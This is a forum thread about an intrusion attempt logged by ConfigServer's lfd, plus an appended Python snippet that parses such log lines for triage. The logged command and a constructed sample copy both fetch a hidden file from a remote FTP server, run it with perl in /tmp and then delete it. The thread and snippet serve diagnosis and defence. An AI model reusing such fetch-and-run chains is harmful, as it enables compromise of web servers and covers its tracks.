Strange "Suspicious Process" in the configserv logs

Discussion in 'Security' started by Douglas Taylor, Mar 4, 2013.

  1. Douglas Taylor

    Code:
    Mar 4 20:09:42 ip-72-167-47-182 lfd[28771]: *Suspicious Process* PID:25132 PPID:25129 User:nobody Uptime:93156 secs EXE:/bin/bash CMD:sh -c cd /tmp;wget ftp://muske:ted7862ted@85.214.65.162/.za.exe;curl -O ftp://muske:ted7862ted@85.214.65.162/.za.exe;perl .za.exe;rm -rf .za
    
    I have literally no idea who or what this is. Pointers? Thanks!
     
  2. Zepplin

  3. quietFinn

    Actually they are trying to download it, then execute it, and after that delete it, so there is nothing left to find :(
     
  4. Douglas Taylor

    I chmod 700 wget and am turning on mod_security in Apache, and we'll see if that helps any.
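
The CMD field of the lfd line in the first post chains a download, an execute and a delete, as quietFinn describes. As an added example (not part of the thread and not ConfigServer's own code), the following parses that lfd line format and tags each step of the chain for triage; the function names, the tool lists and the sample line with its placeholder host, URL and credentials are assumptions constructed for illustration.

```python
import re

# Field layout taken from the lfd "Suspicious Process" line quoted in the thread.
LFD_RE = re.compile(
    r"lfd\[\d+\]: \*Suspicious Process\* PID:(?P<pid>\d+) PPID:(?P<ppid>\d+) "
    r"User:(?P<user>\S+) Uptime:(?P<uptime>\d+) secs EXE:(?P<exe>\S+) CMD:(?P<cmd>.*)$")
URL_RE = re.compile(r"(?:ftp|https?)://(?:(?P<cred>[^@/\s;]+)@)?(?P<host>[^/\s;:]+)")
DOWNLOADERS = {"wget", "curl", "fetch", "lwp-download"}   # assumed tool list
INTERPRETERS = {"perl", "python", "php", "sh", "bash"}    # assumed tool list
TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Constructed sample: same shape as the thread's line, placeholder host/URL/creds.
SAMPLE = ("Mar  4 20:09:42 host1 lfd[1234]: *Suspicious Process* PID:4321 PPID:4320 "
          "User:nobody Uptime:93156 secs EXE:/bin/bash CMD:sh -c cd /tmp;"
          "wget ftp://user:pass@192.0.2.10/.x;curl -O ftp://user:pass@192.0.2.10/.x;"
          "perl .x;rm -rf .x")

def parse_lfd(line):
    """Return the fields of an lfd 'Suspicious Process' line, or None."""
    m = LFD_RE.search(line)
    return m.groupdict() if m else None

def classify(cmd):
    """Tag each ';' / '&&' / '||' / '|' separated step and summarise the chain."""
    stages = []
    for part in re.split(r";|&&|\|\||\|", cmd):
        words = part.split()
        if words[:2] in (["sh", "-c"], ["bash", "-c"]):   # drop the shell wrapper
            words = words[2:]
        tool = words[0].rsplit("/", 1)[-1] if words else ""
        if tool in DOWNLOADERS:
            stages.append("download")
        elif tool in INTERPRETERS and len(words) > 1:
            stages.append("execute")
        elif tool == "rm":
            stages.append("delete")
        elif tool == "cd" and len(words) > 1 and words[1].startswith(TMP_DIRS):
            stages.append("cd_tmp")
    urls = list(URL_RE.finditer(cmd))
    # Only an execute that follows a download counts as download-then-execute.
    after_dl = stages[stages.index("download"):] if "download" in stages else []
    after_ex = after_dl[after_dl.index("execute"):] if "execute" in after_dl else []
    return {
        "stages": stages,
        "hosts": sorted({u.group("host") for u in urls}),
        "embedded_credentials": any(u.group("cred") for u in urls),
        "download_then_execute": bool(after_ex),
        "self_deleting": "delete" in after_ex,
    }
```

Because the chain deletes its own file, the `hosts` and `User` values recovered from the log line are what remain to correlate against web server access logs.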
     